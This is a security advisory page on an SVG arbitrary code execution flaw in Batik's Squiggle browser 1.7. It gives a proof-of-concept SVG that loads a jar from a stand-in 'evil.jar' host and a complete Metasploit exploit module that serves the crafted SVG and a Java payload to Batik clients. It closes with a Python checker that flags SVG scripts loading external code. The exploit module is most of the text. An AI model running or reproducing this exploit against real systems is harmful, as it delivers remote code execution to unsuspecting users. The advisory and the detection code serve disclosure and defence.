Scalable Vector Graphics (SVG) Arbitrary Code Execution Vulnerability

Release date: 2012-05-15
Update date: 2012-05-22

Affected systems:
W3C SVG Scalable Vector Graphics (SVG) Tiny 1.2
W3C SVG Scalable Vector Graphics (SVG) 1.2
Apache Group Batik SVG Toolkit 1.7

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53552

Scalable Vector Graphics (SVG) is an XML-based graphics format for describing two-dimensional vector graphics. SVG is an open standard defined by the W3C.

Implementations of the SVG 1.1 and SVG Tiny 1.2 specifications contain an arbitrary code execution vulnerability; an attacker can exploit it to execute arbitrary code and perform unauthorized operations.

<*Source: Christian Johansson
  http://www.linuxidc.com/Linux/2012-05/60933.htm
*>

Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users assume all risk!

Christian Johansson () provided the following test method:

<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     version="1.0">
<script type="application/java-archive" xlink:href="http://www.example.com/evil.jar"/>
<text>Static text ...</text>
</svg>
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require "msf/core"

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpServer::HTML

    def initialize(info={})
        super(update_info(info,
            "Name"           => "Squiggle 1.7 SVG Browser Java Code Execution",
            "Description"    => %q{
                    This module abuses the SVG support to execute Java Code in the
                Squiggle Browser included in the Batik framework 1.7 through a
                crafted svg file referencing a jar file.

                In order to gain arbitrary code execution, the browser must meet
                the following conditions: (1) It must support at least SVG version
                1.1 or newer, (2) It must support Java code and (3) The "Enforce
                secure scripting" check must be disabled.

                The module has been tested against Windows and Linux platforms.
            },
            "License"        => MSF_LICENSE,
            "Author"         =>
                [
                    "Nicolas Gregoire", # aka @Agarri_FR, Abuse discovery and PoC
                    "sinn3r",           # Metasploit
                    "juan vazquez"      # Metasploit
                ],
            "References"     =>
                [
                    ["URL", "http://www.agarri.fr/blog/"]
                ],
            "Payload"       =>
                {
                    "Space" => 20480,
                    "BadChars" => "",
                    "DisableNops" => true
                },
            "DefaultOptions"  =>
                {
                    "ExitFunction" => "none"
                },
            "Platform"       => ["win", "linux", "java"],
            "Targets"        =>
                [
                    [ "Generic (Java Payload)",
                        {
                            "Arch" => ARCH_JAVA,
                        }
                    ],
                    [ "Windows Universal",
                        {
                            "Arch" => ARCH_X86,
                            "Platform" => "win"
                        }
                    ],
                    [ "Linux x86",
                        {
                            "Arch" => ARCH_X86,
                            "Platform" => "linux"
                        }
                    ]
                ],
            "Privileged"     => false,
            "DisclosureDate" => "May 11 2012",
            "DefaultTarget"  => 0))
    end

    def on_request_uri(cli, request)
        agent = request.headers["User-Agent"]

        # Build the URI of the jar the SVG will reference, under this module's resource path
        jar_uri = ("/" == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
        jar_uri << "/#{rand_text_alpha(rand(6)+3)}.jar"
        rand_text = Rex::Text.rand_text_alphanumeric(rand(8)+4)

        if request.uri =~ /.jar$/
            # Second request: the viewer is fetching the jar referenced by the SVG
            paths = [
                [ "Exploit.class" ],
                [ "Exploit$1.class"],
                [ "META-INF", "MANIFEST.MF"]
            ]

            p = regenerate_payload(cli)

            jar  = p.encoded_jar
            paths.each do |path|
                # Create any missing directory entries before adding the file itself
                1.upto(path.length - 1) do |idx|
                    full = path[0,idx].join("/") + "/"
                    if !(jar.entries.map{|e|e.name}.include?(full))
                        jar.add_file(full, "")
                    end
                end

                fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "batik_svg", path ), "rb")
                data = fd.read(fd.stat.size)
                jar.add_file(path.join("/"), data)
                fd.close
            end

            print_status("Sending jar payload")
            send_response(cli, jar.pack, {"Content-Type"=>"application/java-archive"})

        elsif agent =~ /Batik/
            # First request from a Batik-based viewer: serve the SVG that references the jar
            svg = %Q|
            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">
            <script type="application/java-archive" xlink:href="#{jar_uri}"/>
            <text>#{rand_text}</text>
            </svg>
            |

            # Strip the template's leading indentation only, leaving the markup intact
            svg = svg.gsub(/^[ \t]+/, "")
            print_status("Sending svg")
            send_response(cli, svg, {"Content-Type"=>"image/svg+xml"})

        else
            print_error("I don't know what the client is requesting: #{request.uri}")
        end
    end
end

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

W3C
---
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:
http://www.w3.org/Graphics/SVG/
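While no vendor fix is available, content that reaches an SVG viewer can at least be screened for the pattern the test method above relies on: a <script> element whose type is application/java-archive, or any <script> that pulls in a resource by href. The following Python check is an added example, not part of the advisory, the PoC or the Metasploit module; the sample documents in it are constructed, and the evil.jar URL is the placeholder from the PoC.

```python
"""Flag SVG documents whose <script> elements load external code (added example)."""
import xml.etree.ElementTree as ET

XLINK_NS = "http://www.w3.org/1999/xlink"


def local_name(tag):
    """Strip the '{namespace}' prefix ElementTree puts on qualified names."""
    return tag.rsplit("}", 1)[-1]


def find_script_refs(svg_text):
    """Return one dict per <script> element: its MIME type, the href it
    points at (None for an inline script) and two verdict flags."""
    findings = []
    for el in ET.fromstring(svg_text).iter():
        if local_name(el.tag) != "script":
            continue
        # SVG 1.1 scripts default to ECMAScript when no type is given
        stype = (el.get("type") or "application/ecmascript").strip().lower()
        href = el.get("{%s}href" % XLINK_NS) or el.get("href")
        findings.append({
            "type": stype,
            "href": href,
            "java_archive": stype == "application/java-archive",
            "loads_resource": href is not None,
        })
    return findings


def is_suspicious(svg_text):
    """True when any script is a Java archive or fetches code by URL
    (absolute or relative; the module above serves a relative jar path)."""
    return any(f["java_archive"] or f["loads_resource"]
               for f in find_script_refs(svg_text))


# Constructed samples: the PoC shape, a relative jar reference, and a plain drawing.
SAMPLE_POC = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">
  <script type="application/java-archive" xlink:href="http://www.example.com/evil.jar"/>
  <text>Static text ...</text>
</svg>"""
SAMPLE_RELATIVE = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <script xlink:href="/abc.jar"/>
</svg>"""
SAMPLE_BENIGN = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>'

if __name__ == "__main__":
    for name, doc in (("poc", SAMPLE_POC), ("relative", SAMPLE_RELATIVE), ("benign", SAMPLE_BENIGN)):
        print(name, "suspicious" if is_suspicious(doc) else "clean", find_script_refs(doc))
```

ElementTree does not fetch external entities or DTDs, so the check itself does not follow any URL it finds.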